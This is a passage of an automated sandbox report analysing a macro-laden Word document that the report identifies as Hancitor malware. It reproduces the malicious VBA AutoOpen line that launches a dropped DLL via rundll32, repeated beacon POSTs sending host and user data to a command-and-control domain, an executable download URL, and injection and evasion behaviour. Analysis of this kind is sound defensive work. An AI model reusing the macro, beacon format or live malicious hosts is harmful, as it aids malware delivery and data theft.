Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8328D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 3_2_6F8328D0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: api.ipify.org Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f44.exe HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: sturtevantforcongress.com Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: unknown HTTP traffic detected: POST /8/forum.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: duarreecto.ru Content-Length: 120 Cache-Control: no-cache Data Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: rundll32.exe String found in binary or memory: http://api.ipify.org
Source: rundll32.exe, 00000003.00000002.524132433.000000006F834000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000003.361304939.0000000002730000.00000040.00000001.sdmp String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: rundll32.exe String found in binary or memory: http://api.ipify.org
Source: rundll32.exe, 00000003.00000002.524132433.000000006F834000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000003.361304939.0000000002730000.00000040.00000001.sdmp String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID

System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.2.rundll32.exe.6f830000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 12 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search Ki E
Source: Screenshot number: 16 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 20 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 24 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Document contains an embedded VBA macro which may execute processes
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Document contains an embedded VBA macro with suspicious strings
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F861DD9 3_2_6F861DD9
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 1118_8732615.doc OLE, VBA macro line: Sub AutoOpen()
Document contains embedded VBA macros
Source: 1118_8732615.doc OLE indicator, VBA macros: true
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: sfc.dll
Yara signature match
Source: 3.2.rundll32.exe.6f830000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@7/21@3/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user~1\AppData\Local\Temp\{DF4A57E6-3BE8-48CB-B321-0BB0EAA5C19F} - OProcSessId.dat
Source: 1118_8732615.doc OLE indicator, Word Document stream: true
Source: 1118_8732615.doc OLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start
Source: 1118_8732615.doc Virustotal: Detection: 15%
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: rundll32.exe, 00000003.00000002.524313023.000000006F86A000.00000002.00020000.sdmp, 1118_8732615.doc

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_6F833580
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83F7A0 push FFFFFFFFh; ret 3_2_6F83F7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83BF7F push ecx; ret 3_2_6F83BF88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F84053F push ecx; ret 3_2_6F840540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840CF3 push esp; ret 3_2_6F840D28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840C0C push esi; ret 3_2_6F840C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83CBA4 push edi; ret 3_2_6F83CBFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83DBFB push eax; iretd 3_2_6F83DC08
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83EB0F push ebx; ret 3_2_6F83EB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840B08 pushad ; iretd 3_2_6F840B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83CB68 push edi; ret 3_2_6F83CBFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83EAA7 push ebx; ret 3_2_6F83EB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83D2E7 push esp; ret 3_2_6F83D2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8602F4 push ecx; ret 3_2_6F860306

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 1020
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\22.mp4
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F864250 FindFirstFileExA, 3_2_6F864250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 3_2_6F833400
Source: C:\Windows\SysWOW64\rundll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F863E04 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F863E04
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_6F833580
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8624FB mov eax, dword ptr fs:[00000030h] 3_2_6F8624FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A13E3 mov eax, dword ptr fs:[00000030h] 3_2_6F8A13E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A1319 mov eax, dword ptr fs:[00000030h] 3_2_6F8A1319
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8A0F21 push dword ptr fs:[00000030h] 3_2_6F8A0F21
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F831390 GetProcessHeap,RtlAllocateHeap, 3_2_6F831390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F863E04 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F863E04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F86032C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6F86032C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F86012C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F86012C

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.82.218.163 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 8.208.13.158 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 54.235.142.93 80
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 600000 protect: page execute and read and write
Contains functionality to inject threads in other processes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle, 3_2_6F833880
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: 1118_8732615.doc, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.521249721.0000000002DB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F85FBA4 cpuid 3_2_6F85FBA4
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F85FD74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_6F85FD74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F831AA0 GetVersion,wsprintfA,Sleep,wsprintfA, 3_2_6F831AA0

Remote Access Functionality:

Yara detected Hancitor
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6848, type: MEMORY

Behavior Graph: ID: 319766, Sample: 1118_8732615.doc, Startdate: 18/11/2020, Architecture: WINDOWS, Score: 100

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
8.208.13.158 unknown Singapore 45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true
54.235.142.93 unknown United States 14618 AMAZON-AESUS false
185.82.218.163 unknown Bulgaria 59729 ITL-BG true

Contacted Domains

Name IP Active
sturtevantforcongress.com 8.208.13.158 true
elb097307-934924932.us-east-1.elb.amazonaws.com 54.235.142.93 true
duarreecto.ru 185.82.218.163 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api.ipify.org/ false - high
http://duarreecto.ru/8/forum.php true Avira URL Cloud: safe unknown